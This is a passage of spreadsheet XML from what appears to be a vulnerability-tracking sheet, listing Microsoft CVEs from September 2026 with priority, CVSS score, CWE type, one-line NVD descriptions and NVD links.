      </c>
      <c r="C844" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69338</t>
        </is>
      </c>
      <c r="D844" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E844" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F844" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G844" s="5" t="inlineStr"/>
      <c r="H844" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I844" s="5" t="inlineStr"/>
      <c r="J844" s="5" t="inlineStr"/>
      <c r="K844" s="5" t="inlineStr"/>
      <c r="L844" s="5" t="inlineStr"/>
      <c r="M844" s="5" t="inlineStr"/>
      <c r="N844" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O844" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P844" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q844" s="5" t="inlineStr"/>
      <c r="R844" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S844" s="5" t="inlineStr">
        <is>
          <t>Use after free in Remote Desktop Gateway Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T844" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69338</t>
        </is>
      </c>
    </row>
    <row r="845">
      <c r="A845" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B845" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C845" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69340</t>
        </is>
      </c>
      <c r="D845" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E845" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F845" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G845" s="5" t="inlineStr"/>
      <c r="H845" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I845" s="5" t="inlineStr"/>
      <c r="J845" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K8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45" s="5" t="inlineStr"/>
      <c r="M845" s="5" t="inlineStr"/>
      <c r="N845" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O845" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P845" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q845" s="5" t="inlineStr"/>
      <c r="R845" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-125</t>
        </is>
      </c>
      <c r="S845" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="T845" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69340</t>
        </is>
      </c>
    </row>
    <row r="846">
      <c r="A846" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B846" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C846" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69357</t>
        </is>
      </c>
      <c r="D846" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E846" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F846" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G846" s="5" t="inlineStr"/>
      <c r="H846" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I846" s="5" t="inlineStr"/>
      <c r="J846" s="5" t="inlineStr"/>
      <c r="K846" s="5" t="inlineStr"/>
      <c r="L846" s="5" t="inlineStr"/>
      <c r="M846" s="5" t="inlineStr"/>
      <c r="N846" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O846" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P846" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q846" s="5" t="inlineStr"/>
      <c r="R846" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S846" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows NDIS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T846" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69357</t>
        </is>
      </c>
    </row>
    <row r="847">
      <c r="A847" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B847" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C847" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69358</t>
        </is>
      </c>
      <c r="D847" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E847" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F847" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G847" s="5" t="inlineStr"/>
      <c r="H847" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I847" s="5" t="inlineStr"/>
      <c r="J847" s="5" t="inlineStr"/>
      <c r="K847" s="5" t="inlineStr"/>
      <c r="L847" s="5" t="inlineStr"/>
      <c r="M847" s="5" t="inlineStr"/>
      <c r="N847" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O847" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P847" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q847" s="5" t="inlineStr"/>
      <c r="R847" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="S847" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in Remote Desktop Client allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T847" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69358</t>
        </is>
      </c>
    </row>
    <row r="848">
      <c r="A848" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B848" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C848" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69364</t>
        </is>
      </c>
      <c r="D848" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E848" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F848" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G848" s="5" t="inlineStr"/>
      <c r="H848" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I848" s="5" t="inlineStr"/>
      <c r="J848" s="5" t="inlineStr"/>
      <c r="K848" s="5" t="inlineStr"/>
      <c r="L848" s="5" t="inlineStr"/>
      <c r="M848" s="5" t="inlineStr"/>
      <c r="N848" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O848" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P848" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q848" s="5" t="inlineStr"/>
      <c r="R848" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="S848" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Print Spooler Components allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T848" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69364</t>
        </is>
      </c>
    </row>
    <row r="849">
      <c r="A849" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B849" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C849" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69366</t>
        </is>
      </c>
      <c r="D849" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E849" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F849" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G849" s="5" t="inlineStr"/>
      <c r="H849" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I849" s="5" t="inlineStr"/>
      <c r="J849" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K8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49" s="5" t="inlineStr"/>
      <c r="M849" s="5" t="inlineStr"/>
      <c r="N849" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O849" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P849" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q849" s="5" t="inlineStr"/>
      <c r="R849" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S849" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T849" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69366</t>
        </is>
      </c>
    </row>
    <row r="850">
      <c r="A850" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B850" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C850" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69384</t>
        </is>
      </c>
      <c r="D850" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E850" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F850" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G850" s="5" t="inlineStr"/>
      <c r="H850" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I850" s="5" t="inlineStr"/>
      <c r="J850" s="5" t="inlineStr"/>
      <c r="K850" s="5" t="inlineStr"/>
      <c r="L850" s="5" t="inlineStr"/>
      <c r="M850" s="5" t="inlineStr"/>
      <c r="N850" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O850" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P850" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q850" s="5" t="inlineStr"/>
      <c r="R850" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="S850" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Virtual Hard Disk (VHD) Miniport Driver allows an unauthorized attacker to deny service locally.</t>
        </is>
      </c>
      <c r="T850" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69384</t>
        </is>
      </c>
    </row>
    <row r="851">
      <c r="A851" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B851" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C851" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69396</t>
        </is>
      </c>
      <c r="D851" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E851" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F851" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G851" s="5" t="inlineStr"/>
      <c r="H851" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I851" s="5" t="inlineStr"/>
      <c r="J851" s="5" t="inlineStr"/>
      <c r="K851" s="5" t="inlineStr"/>
      <c r="L851" s="5" t="inlineStr"/>
      <c r="M851" s="5" t="inlineStr"/>
      <c r="N851" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O851" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P851" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q851" s="5" t="inlineStr"/>
      <c r="R851" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S851" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows NDIS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T851" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69396</t>
        </is>
      </c>
    </row>
    <row r="852">
      <c r="A852" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B852" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C852" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69451</t>
        </is>
      </c>
      <c r="D852" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E852" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F852" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G852" s="5" t="inlineStr"/>
      <c r="H852" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I852" s="5" t="inlineStr"/>
      <c r="J852" s="5" t="inlineStr"/>
      <c r="K852" s="5" t="inlineStr"/>
      <c r="L852" s="5" t="inlineStr"/>
      <c r="M852" s="5" t="inlineStr"/>
      <c r="N852" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O852" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P852" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q852" s="5" t="inlineStr"/>
      <c r="R852" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S852" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Management Instrumentation allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T852" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69451</t>
        </is>
      </c>
    </row>
    <row r="853">
      <c r="A853" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B853" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C853" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69460</t>
        </is>
      </c>
      <c r="D853" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E853" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F853" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G853" s="5" t="inlineStr"/>
      <c r="H853" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I853" s="5" t="inlineStr"/>
      <c r="J853" s="5" t="inlineStr"/>
      <c r="K853" s="5" t="inlineStr"/>
      <c r="L853" s="5" t="inlineStr"/>
      <c r="M853" s="5" t="inlineStr"/>
      <c r="N853" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O853" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P853" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q853" s="5" t="inlineStr"/>
      <c r="R853" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S853" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T853" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69460</t>
        </is>
      </c>
    </row>
    <row r="854">
      <c r="A854" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B854" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C854" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69482</t>
        </is>
      </c>
      <c r="D854" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E854" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F854" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G854" s="5" t="inlineStr"/>
      <c r="H854" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I854" s="5" t="inlineStr"/>
      <c r="J854" s="5" t="inlineStr"/>
      <c r="K854" s="5" t="inlineStr"/>
      <c r="L854" s="5" t="inlineStr"/>
      <c r="M854" s="5" t="inlineStr"/>
      <c r="N854" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O854" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P854" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q854" s="5" t="inlineStr"/>
      <c r="R854" s="5" t="inlineStr">
        <is>
          <t>CWE-379</t>
        </is>
      </c>
      <c r="S854" s="5" t="inlineStr">
        <is>
          <t>Creation of temporary file in directory with insecure permissions in Windows Error Reporting allows an authorized attacker to perform tampering locally.</t>
        </is>
      </c>
      <c r="T854" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69482</t>
        </is>
      </c>
    </row>
    <row r="855">
      <c r="A855" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B855" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C855" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69536</t>
        </is>
      </c>
      <c r="D855" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E855" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F855" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G855" s="5" t="inlineStr"/>
      <c r="H855" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I855" s="5" t="inlineStr"/>
      <c r="J855" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K855" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L855" s="5" t="inlineStr"/>
      <c r="M855" s="5" t="inlineStr"/>
      <c r="N855" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O855" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P855" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q855" s="5" t="inlineStr"/>
      <c r="R855" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S855" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Desktop Services allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T855" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69536</t>
        </is>
      </c>
    </row>
    <row r="856">
      <c r="A856" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B856" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C856" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69553</t>
        </is>
      </c>
      <c r="D856" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E856" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F856" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G856" s="5" t="inlineStr"/>
      <c r="H856" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I856" s="5" t="inlineStr"/>
      <c r="J856" s="5" t="inlineStr"/>
      <c r="K856" s="5" t="inlineStr"/>
      <c r="L856" s="5" t="inlineStr"/>
      <c r="M856" s="5" t="inlineStr"/>
      <c r="N856" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O856" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P856" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q856" s="5" t="inlineStr"/>
      <c r="R856" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S856" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Windows Hyper-V allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T856" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69553</t>
        </is>
      </c>
    </row>
    <row r="857">
      <c r="A857" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B857" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C857" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69597</t>
        </is>
      </c>
      <c r="D857" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E857" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F857" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G857" s="5" t="inlineStr"/>
      <c r="H857" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I857" s="5" t="inlineStr"/>
      <c r="J857" s="5" t="inlineStr"/>
      <c r="K857" s="5" t="inlineStr"/>
      <c r="L857" s="5" t="inlineStr"/>
      <c r="M857" s="5" t="inlineStr"/>
      <c r="N857" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O857" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P857" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q857" s="5" t="inlineStr"/>
      <c r="R857" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S857" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows HTTP.sys allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T857" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69597</t>
        </is>
      </c>
    </row>
    <row r="858">
      <c r="A858" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B858" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C858" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69602</t>
        </is>
      </c>
      <c r="D858" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E858" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F858" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G858" s="5" t="inlineStr"/>
      <c r="H858" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I858" s="5" t="inlineStr"/>
      <c r="J858" s="5" t="inlineStr"/>
      <c r="K858" s="5" t="inlineStr"/>
      <c r="L858" s="5" t="inlineStr"/>
      <c r="M858" s="5" t="inlineStr"/>
      <c r="N858" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O858" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P858" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q858" s="5" t="inlineStr"/>
      <c r="R858" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S858" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows PrintWorkflowUserSvc allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T858" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69602</t>
        </is>
      </c>
    </row>
    <row r="859">
      <c r="A859" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B859" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C859" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69688</t>
        </is>
      </c>
      <c r="D859" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E859" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F859" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G859" s="5" t="inlineStr"/>
      <c r="H859" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I859" s="5" t="inlineStr"/>
      <c r="J859" s="5" t="inlineStr"/>
      <c r="K859" s="5" t="inlineStr"/>
      <c r="L859" s="5" t="inlineStr"/>
      <c r="M859" s="5" t="inlineStr"/>
      <c r="N859" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O859" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P859" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q859" s="5" t="inlineStr"/>
      <c r="R859" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S859" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Encrypting File System (EFS) allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T859" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69688</t>
        </is>
      </c>
    </row>
    <row r="860">
      <c r="A860" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B860" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C860" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69706</t>
        </is>
      </c>
      <c r="D860" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E860" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F860" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G860" s="5" t="inlineStr"/>
      <c r="H860" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I860" s="5" t="inlineStr"/>
      <c r="J860" s="5" t="inlineStr"/>
      <c r="K860" s="5" t="inlineStr"/>
      <c r="L860" s="5" t="inlineStr"/>
      <c r="M860" s="5" t="inlineStr"/>
      <c r="N860" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O860" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P860" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q860" s="5" t="inlineStr"/>
      <c r="R860" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S860" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T860" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69706</t>
        </is>
      </c>
    </row>
    <row r="861">
      <c r="A861" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B861" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C861" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69757</t>
        </is>
      </c>
      <c r="D861" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E861" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F861" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G861" s="5" t="inlineStr"/>
      <c r="H861" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I861" s="5" t="inlineStr"/>
      <c r="J861" s="5" t="inlineStr"/>
      <c r="K861" s="5" t="inlineStr"/>
      <c r="L861" s="5" t="inlineStr"/>
      <c r="M861" s="5" t="inlineStr"/>
      <c r="N861" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O861" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P861" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q861" s="5" t="inlineStr"/>
      <c r="R861" s="5" t="inlineStr">
        <is>
